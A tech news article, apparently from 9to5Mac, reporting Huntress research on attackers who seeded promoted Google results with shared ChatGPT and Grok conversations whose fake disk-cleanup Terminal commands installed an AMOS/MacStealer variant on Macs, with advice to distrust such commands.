Attackers use ChatGPT to trick Mac users into installing MacStealer

Security researchers have discovered that attackers are using ChatGPT to trick Mac users into pasting command lines into their terminals that install malware. Specifically, it installs MacStealer, which allows attackers to obtain iCloud passwords, files, and credit card details.

The attack targeted people who were searching on Google for ways to free up disk space on their Macs.

Engadget’s Sam Chapman said he was following the growing trend of using AI to find new ways to perform old scams when he came across the report from cybersecurity firm Huntress.

Hackers are apparently using AI prompts to seed Google search results with dangerous commands. When executed by an unsuspecting user, these commands prompt the hacker to give the computer the necessary access to install malware.

The attackers had a conversation with ChatGPT, where they introduced terminal commands, made the chat public, and paid Google to promote the link. Huntress said this helped it appear higher in Google search results for freeing up disk space on your Mac.

The victim was searching for “clear macOS disk space.” Google displayed two highly ranked results at the top of the page. One directed end users to a ChatGPT conversation, and the other to a Grok conversation. Both were hosted on their respective legitimate platforms. Both conversations provided thorough, step-by-step troubleshooting guidance. Both included instructions, with macOS Terminal commands listed as “safe system cleanup” steps.

The user clicked on the ChatGPT link, read the conversation, and executed the provided command. They trusted that they were being shown by the search engines they used every day, delivered through legitimate platforms, and following advice from their trusted AI assistants. Instead, they executed commands to download a variant of the AMOS stealer, silently capture passwords, escalate to root, and deploy persistent malware.

The same thing was done with X’s Grok chatbot. The target search keywords were:

  • Free up storage on your Mac
  • Clear macOS disk space
  • How to erase data on your iMac
  • Clear your iMac’s system data

This is a worryingly clever approach, as it bypasses all built-in protections in macOS and allows users to install malware without warning. This takes advantage of the fact that people trust the well-known brands of both Google and ChatGPT.

9to5Mac’s opinion

Pasting commands into the terminal without understanding them is a dangerous practice at the best of times. If you do, you need to make sure that the source is absolutely reliable. Google’s sponsored search results are completely unreliable.

It’s very easy for non-technical users to fall for this, so it’s a good idea to warn your family and friends.

Featured accessories

Photo by Ilya Pavlov on Unsplash

Add 9to5Mac as a preferred source on Google
Add 9to5Mac as a preferred source on Google

Tags:

We will be happy to hear your thoughts

Leave a reply

Cyberstorehut
Logo
Shopping cart